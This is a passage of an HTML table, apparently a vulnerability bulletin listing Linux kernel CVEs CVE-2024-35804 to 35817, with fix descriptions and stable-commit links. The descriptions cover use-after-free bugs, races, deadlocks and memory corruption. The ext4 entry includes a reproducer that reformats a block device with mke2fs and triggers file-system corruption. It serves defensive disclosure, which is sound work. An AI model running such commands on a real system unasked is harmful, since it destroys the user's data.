<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35804" target="_blank">CVE-2024-35804</a><br><a href="https://git.kernel.org/stable/c/225d587a073584946c05c9b7651d637bd45c0c71" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/726374dde5d608b15b9756bd52b6fc283fda7a06" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/910c57dfa4d113aae6571c2a8b9ae8c430975902" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/9d1b22e573a3789ed1f32033ee709106993ba551" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/a9bd6bb6f02bf7132c1ab192ba62bbfa52df7d66" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: dm snapshot: fix lockup in dm_exception_table_exit There was reported lockup when we exit a snapshot with many exceptions. Fix this by adding "cond_resched" to the loop that frees the exceptions.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35805" target="_blank">CVE-2024-35805</a><br><a href="https://git.kernel.org/stable/c/116562e804ffc9dc600adab6326dde31d72262c7" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/3d47eb405781cc5127deca9a14e24b27696087a1" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/5f4ad4d0b0943296287313db60b3f84df4aad683" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/6e7132ed3c07bd8a6ce3db4bb307ef2852b322dc" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/9759ff196e7d248bcf8386a7451d6ff8537a7d9c" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/e50f83061ac250f90710757a3e51b70a200835e2" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/e7d4cff57c3c43fdd72342c78d4138f509c7416e" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/fa5c055800a7fd49a36bbb52593aca4ea986a366" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: soc: fsl: qbman: Always disable interrupts when taking cgr_lock smp_call_function_single disables IRQs when executing the callback. To prevent deadlocks, we must disable IRQs when taking cgr_lock elsewhere. This is already done by qman_update_cgr and qman_delete_cgr; fix the other lockers.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35806" target="_blank">CVE-2024-35806</a><br><a href="https://git.kernel.org/stable/c/0e6521b0f93ff350434ed4ae61a250907e65d397" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/276af8efb05c8e47acf2738a5609dd72acfc703f" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/584c2a9184a33a40fceee838f856de3cffa19be3" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/62c3ecd2833cff0eff4a82af4082c44ca8d2518a" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/a62168653774c36398d65846a98034436ee66d03" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/af25c5180b2b1796342798f6c56fcfd12f5035bd" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/b56a793f267679945d1fdb9a280013bd2d0ed7f9" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/dd199e5b759ffe349622a4b8fbcafc51fc51b1ec" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/e6378314bb920acb39013051fa65d8f9f8030430" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: ext4: fix corruption during on-line resize We observed a corruption during on-line resize of a file system that is larger than 16 TiB with 4k block size. With having more then 2^32 blocks resize_inode is turned off by default by mke2fs. The issue can be reproduced on a smaller file system for convenience by explicitly turning off resize_inode. An on-line resize across an 8 GiB boundary (the size of a meta block group in this setup) then leads to a corruption: dev=/dev/&lt;some_dev&gt; # should be &gt;= 16 GiB mkdir -p /corruption /sbin/mke2fs -t ext4 -b 4096 -O ^resize_inode $dev $((2 * 2**21 - 2**15)) mount -t ext4 $dev /corruption dd if=/dev/zero bs=4096 of=/corruption/test count=$((2*2**21 - 4*2**15)) sha1sum /corruption/test # 79d2658b39dcfd77274e435b0934028adafaab11 /corruption/test /sbin/resize2fs $dev $((2*2**21)) # drop page cache to force reload the block from disk echo 1 &gt; /proc/sys/vm/drop_caches sha1sum /corruption/test # 3c2abc63cbf1a94c9e6977e0fbd72cd832c4d5c3 /corruption/test 2^21 = 2^15*2^6 equals 8 GiB whereof 2^15 is the number of blocks per block group and 2^6 are the number of block groups that make a meta block group. The last checksum might be different depending on how the file is laid out across the physical blocks. The actual corruption occurs at physical block 63*2^15 = 2064384 which would be the location of the backup of the meta block group's block descriptor. During the on-line resize the file system will be converted to meta_bg starting at s_first_meta_bg which is 2 in the example - meaning all block groups after 16 GiB. However, in ext4_flex_group_add we might add block groups that are not part of the first meta block group yet. In the reproducer we achieved this by substracting the size of a whole block group from the point where the meta block group would start. This must be considered when updating the backup block group descriptors to follow the non-meta_bg layout. The fix is to add a test whether the group to add is already part of the meta block group or not.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35807" target="_blank">CVE-2024-35807</a><br><a href="https://git.kernel.org/stable/c/239c669edb2bffa1aa2612519b1d438ab35d6be6" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/37b6a3ba793bbbae057f5b991970ebcc52cb3db5" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/722d2c01b8b108f8283d1b7222209d5b2a5aa7bd" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/75cc31c2e7193b69f5d25650bda5bb42ed92f8a1" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/a6b3bfe176e8a5b05ec4447404e412c2a3fc92cc" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/b461910af8ba3bed80f48c2bf852686d05c6fc5c" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/e8e8b197317228b5089ed9e7802dadf3ccaa027a" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/ee4e9c1976147a850f6085a13fca95bcaa00d84c" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/fb1088d51bbaa0faec5a55d4f5818a9ab79e24df" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: md/dm-raid: don't call md_reap_sync_thread() directly Currently md_reap_sync_thread() is called from raid_message() directly without holding 'reconfig_mutex', this is definitely unsafe because md_reap_sync_thread() can change many fields that is protected by 'reconfig_mutex'. However, hold 'reconfig_mutex' here is still problematic because this will cause deadlock, for example, commit 130443d60b1b ("md: refactor idle/frozen_sync_thread() to fix deadlock"). Fix this problem by using stop_sync_thread() to unregister sync_thread, like md/raid did.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35808" target="_blank">CVE-2024-35808</a><br><a href="https://git.kernel.org/stable/c/347dcdc15a1706f61aa545ae498ededdf31aeebc" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/9e59b8d76ff511505eb0dd1478329f09e0f04669" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/cd32b27a66db8776d8b8e82ec7d7dde97a8693b0" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: PCI/PM: Drain runtime-idle callbacks before driver removal A race condition between the .runtime_idle() callback and the .remove() callback in the rtsx_pcr PCI driver leads to a kernel crash due to an unhandled page fault [1]. The problem is that rtsx_pci_runtime_idle() is not expected to be running after pm_runtime_get_sync() has been called, but the latter doesn't really guarantee that. It only guarantees that the suspend and resume callbacks will not be running when it returns. However, if a .runtime_idle() callback is already running when pm_runtime_get_sync() is called, the latter will notice that the runtime PM status of the device is RPM_ACTIVE and it will return right away without waiting for the former to complete. In fact, it cannot wait for .runtime_idle() to complete because it may be called from that callback (it arguably does not make much sense to do that, but it is not strictly prohibited). Thus in general, whoever is providing a .runtime_idle() callback needs to protect it from running in parallel with whatever code runs after pm_runtime_get_sync(). [Note that .runtime_idle() will not start after pm_runtime_get_sync() has returned, but it may continue running then if it has started earlier.] One way to address that race condition is to call pm_runtime_barrier() after pm_runtime_get_sync() (not before it, because a nonzero value of the runtime PM usage counter is necessary to prevent runtime PM callbacks from being invoked) to wait for the .runtime_idle() callback to complete should it be running at that point. A suitable place for doing that is in pci_device_remove() which calls pm_runtime_get_sync() before removing the driver, so it may as well call pm_runtime_barrier() subsequently, which will prevent the race in question from occurring, not just in the rtsx_pcr driver, but in any PCI drivers providing .runtime_idle() callbacks.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35809" target="_blank">CVE-2024-35809</a><br><a href="https://git.kernel.org/stable/c/47d8aafcfe313511a98f165a54d0adceb34e54b1" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/6347348c6aba52dda0b33296684cbb627bdc6970" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/7cc94dd36e48879e76ae7a8daea4ff322b7d9674" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/900b81caf00c89417172afe0e7e49ac4eb110f4b" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/9a87375bb586515c0af63d5dcdcd58ec4acf20a6" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/9d5286d4e7f68beab450deddbb6a32edd5ecf4bf" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/bbe068b24409ef740657215605284fc7cdddd491" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/d534198311c345e4b062c4b88bb609efb8bd91d5" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/d86ad8c3e152349454b82f37007ff6ba45f26989" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: drm/vmwgfx: Fix the lifetime of the bo cursor memory The cleanup can be dispatched while the atomic update is still active, which means that the memory acquired in the atomic update needs to not be invalidated by the cleanup. The buffer objects in vmw_plane_state instead of using the builtin map_and_cache were trying to handle the lifetime of the mapped memory themselves, leading to crashes. Use the map_and_cache instead of trying to manage the lifetime of the buffer objects held by the vmw_plane_state. Fixes kernel oops'es in IGT's kms_cursor_legacy forked-bo.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35810" target="_blank">CVE-2024-35810</a><br><a href="https://git.kernel.org/stable/c/104a5b2772bc7c0715ae7355ccf9d294a472765c" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/86cb706a40b7e6b2221ee49a298a65ad9b46c02d" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/9a9e8a7159ca09af9b1a300a6c8e8b6ff7501c76" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/ed381800ea6d9a4c7f199235a471c0c48100f0ae" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: wifi: brcmfmac: Fix use-after-free bug in brcmf_cfg80211_detach This is the candidate patch of CVE-2023-47233 : https://nvd.nist.gov/vuln/detail/CVE-2023-47233 In brcm80211 driver,it starts with the following invoking chain to start init a timeout worker: -&gt;brcmf_usb_probe -&gt;brcmf_usb_probe_cb -&gt;brcmf_attach -&gt;brcmf_bus_started -&gt;brcmf_cfg80211_attach -&gt;wl_init_priv -&gt;brcmf_init_escan -&gt;INIT_WORK(&amp;cfg-&gt;escan_timeout_work, brcmf_cfg80211_escan_timeout_worker); If we disconnect the USB by hotplug, it will call brcmf_usb_disconnect to make cleanup. The invoking chain is : brcmf_usb_disconnect -&gt;brcmf_usb_disconnect_cb -&gt;brcmf_detach -&gt;brcmf_cfg80211_detach -&gt;kfree(cfg); While the timeout woker may still be running. This will cause a use-after-free bug on cfg in brcmf_cfg80211_escan_timeout_worker. Fix it by deleting the timer and canceling the worker in brcmf_cfg80211_detach. [arend.vanspriel@broadcom.com: keep timer delete as is and cancel work just before free]</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35811" target="_blank">CVE-2024-35811</a><br><a href="https://git.kernel.org/stable/c/0a7591e14a8da794d0b93b5d1c6254ccb23adacb" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/0b812f706fd7090be74812101114a0e165b36744" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/0f7352557a35ab7888bc7831411ec8a3cbe20d78" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/190794848e2b9d15de92d502b6ac652806904f5a" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/202c503935042272e2f9e1bb549d5f69a8681169" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/6678a1e7d896c00030b31491690e8ddc9a90767a" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/8c36205123dc57349b59b4f1a2301eb278cbc731" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/8e3f03f4ef7c36091f46e7349096efb5a2cdb3a1" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/bacb8c3ab86dcd760c15903fcee58169bc3026aa" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: usb: cdc-wdm: close race between read and workqueue wdm_read() cannot race with itself. However, in service_outstanding_interrupt() it can race with the workqueue, which can be triggered by error handling. Hence we need to make sure that the WDM_RESPONDING flag is not just only set but tested.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35812" target="_blank">CVE-2024-35812</a><br><a href="https://git.kernel.org/stable/c/164be0a824387301312689bb29b2be92ab2cd39d" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/19f955ad9437a6859a529af34e2eafd903d5e7c1" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/2ff436b6399859e06539a2b9c667897d3cc85ad5" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/339f83612f3a569b194680768b22bf113c26a29d" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/347cca11bb78b9f3c29b45a9c52e70258bd008bf" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/3afdcc4e1a00facad210f5c5891bb2fbc026067f" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/5904411219601127ffdbd2d622bb5d67f9d8d16c" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/7182175f565ffffa2ba1911726c5656bfc7a1bae" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/8672ad663a22d0e4a325bb7d817b36ec412b967c" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/916cd2fcbc1e344bcabf4b2a834cdf5a0417d30c" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/9723602387217caa71d623ffcce314dc39e84a09" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/9b319f4a88094b2e020e6db6e819c808d890098d" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/a86e54a345139f1a7668c9f83bdc7ac6f91b6f78" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/ab92e11b73b48b79f144421430891f3aa6242656" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/da3b75931bb737be74d6b4341e0080f233ed1409" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/e4e47e406d74cab601b2ab21ba5e3add811e05ae" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: mmc: core: Avoid negative index with array access Commit 4d0c8d0aef63 ("mmc: core: Use mrq.sbc in close-ended ffu") assigns prev_idata = idatas[i - 1], but doesn't check that the iterator i is greater than zero. Let's fix this by adding a check.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35813" target="_blank">CVE-2024-35813</a><br><a href="https://git.kernel.org/stable/c/064db53f9023a2d5877a2d12de6bc27995f6ca56" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/2b539c88940e22494da80a93ee1c5a28bbad10f6" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/4466677dcabe2d70de6aa3d4bd4a4fafa94a71f2" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/7d0e8a6147550aa058fa6ade8583ad252aa61304" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/81b8645feca08a54c7c4bf36e7b176f4983b2f28" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/ad9cc5e9e53ab94aa0c7ac65d43be7eb208dcb55" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/b9a7339ae403035ffe7fc37cb034b36947910f68" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/cf55a7acd1ed38afe43bba1c8a0935b51d1dc014" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: swiotlb: Fix double-allocation of slots due to broken alignment handling Commit bbb73a103fbb ("swiotlb: fix a braino in the alignment check fix"), which was a fix for commit 0eee5ae10256 ("swiotlb: fix slot alignment checks"), causes a functional regression with vsock in a virtual machine using bouncing via a restricted DMA SWIOTLB pool. When virtio allocates the virtqueues for the vsock device using dma_alloc_coherent(), the SWIOTLB search can return page-unaligned allocations if 'area-&gt;index' was left unaligned by a previous allocation from the buffer: # Final address in brackets is the SWIOTLB address returned to the caller | virtio-pci 0000:00:07.0: orig_addr 0x0 alloc_size 0x2000, iotlb_align_mask 0x800 stride 0x2: got slot 1645-1649/7168 (0x98326800) | virtio-pci 0000:00:07.0: orig_addr 0x0 alloc_size 0x2000, iotlb_align_mask 0x800 stride 0x2: got slot 1649-1653/7168 (0x98328800) | virtio-pci 0000:00:07.0: orig_addr 0x0 alloc_size 0x2000, iotlb_align_mask 0x800 stride 0x2: got slot 1653-1657/7168 (0x9832a800) This ends badly (typically buffer corruption and/or a hang) because swiotlb_alloc() is expecting a page-aligned allocation and so blindly returns a pointer to the 'struct page' corresponding to the allocation, therefore double-allocating the first half (2KiB slot) of the 4KiB page. Fix the problem by treating the allocation alignment separately to any additional alignment requirements from the device, using the maximum of the two as the stride to search the buffer slots and taking care to ensure a minimum of page-alignment for buffers larger than a page. This also resolves swiotlb allocation failures occuring due to the inclusion of ~PAGE_MASK in 'iotlb_align_mask' for large allocations and resulting in alignment requirements exceeding swiotlb_max_mapping_size().</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35814" target="_blank">CVE-2024-35814</a><br><a href="https://git.kernel.org/stable/c/04867a7a33324c9c562ee7949dbcaab7aaad1fb4" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/3e7acd6e25ba77dde48c3b721c54c89cd6a10534" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/777391743771040e12cc40d3d0d178f70c616491" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/c88668aa6c1da240ea3eb4d128b7906e740d3cb8" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: fs/aio: Check IOCB_AIO_RW before the struct aio_kiocb conversion The first kiocb_set_cancel_fn() argument may point at a struct kiocb that is not embedded inside struct aio_kiocb. With the current code, depending on the compiler, the req-&gt;ki_ctx read happens either before the IOCB_AIO_RW test or after that test. Move the req-&gt;ki_ctx read such that it is guaranteed that the IOCB_AIO_RW test happens first.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35815" target="_blank">CVE-2024-35815</a><br><a href="https://git.kernel.org/stable/c/10ca82aff58434e122c7c757cf0497c335f993f3" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/18d5fc3c16cc317bd0e5f5dabe0660df415cadb7" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/396dbbc18963648e9d1a4edbb55cfe08fa374d50" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/5c43d0041e3a05c6c41c318b759fff16d2384596" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/94eb0293703ced580f05dfbe5a57da5931e9aee2" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/961ebd120565cb60cebe21cb634fbc456022db4a" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/a71cba07783abc76b547568b6452cd1dd9981410" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/c01ed748847fe8b810d86efc229b9e6c7fafa01e" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: firewire: ohci: prevent leak of left-over IRQ on unbind Commit 5a95f1ded28691e6 ("firewire: ohci: use devres for requested IRQ") also removed the call to free_irq() in pci_remove(), leading to a leftover irq of devm_request_irq() at pci_disable_msi() in pci_remove() when unbinding the driver from the device remove_proc_entry: removing non-empty directory 'irq/136', leaking at least 'firewire_ohci' Call Trace: ? remove_proc_entry+0x19c/0x1c0 ? __warn+0x81/0x130 ? remove_proc_entry+0x19c/0x1c0 ? report_bug+0x171/0x1a0 ? console_unlock+0x78/0x120 ? handle_bug+0x3c/0x80 ? exc_invalid_op+0x17/0x70 ? asm_exc_invalid_op+0x1a/0x20 ? remove_proc_entry+0x19c/0x1c0 unregister_irq_proc+0xf4/0x120 free_desc+0x3d/0xe0 ? kfree+0x29f/0x2f0 irq_free_descs+0x47/0x70 msi_domain_free_locked.part.0+0x19d/0x1d0 msi_domain_free_irqs_all_locked+0x81/0xc0 pci_free_msi_irqs+0x12/0x40 pci_disable_msi+0x4c/0x60 pci_remove+0x9d/0xc0 [firewire_ohci 01b483699bebf9cb07a3d69df0aa2bee71db1b26] pci_device_remove+0x37/0xa0 device_release_driver_internal+0x19f/0x200 unbind_store+0xa1/0xb0 remove irq with devm_free_irq() before pci_disable_msi() also remove it in fail_msi: of pci_probe() as this would lead to an identical leak</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35816" target="_blank">CVE-2024-35816</a><br><a href="https://git.kernel.org/stable/c/318f6d53dd425c400e35f1a9b7af682c2c6a66d6" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/43c70cbc2502cf2557105c662eeed6a15d082b88" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/575801663c7dc38f826212b39e3b91a4a8661c33" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: amdgpu_ttm_gart_bind set gtt bound flag Otherwise after the GTT bo is released, the GTT and gart space is freed but amdgpu_ttm_backend_unbind will not clear the gart page table entry and leave valid mapping entry pointing to the stale system page. Then if GPU access the gart address mistakely, it will read undefined value instead page fault, harder to debug and reproduce the real issue.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35817" target="_blank">CVE-2024-35817</a><br><a href="https://git.kernel.org/stable/c/589c414138a1bed98e652c905937d8f790804efe" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/5cdce3dda3b3dacde902f63a8ee72c2b7f91912d" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/5d5f1a7f3b1039925f79c7894f153c2a905201fb" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/6c6064cbe58b43533e3451ad6a8ba9736c109ac3" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/6fcd12cb90888ef2d8af8d4c04e913252eee4ef3" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/e8d27caef2c829a306e1f762fb95f06e8ec676f6" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
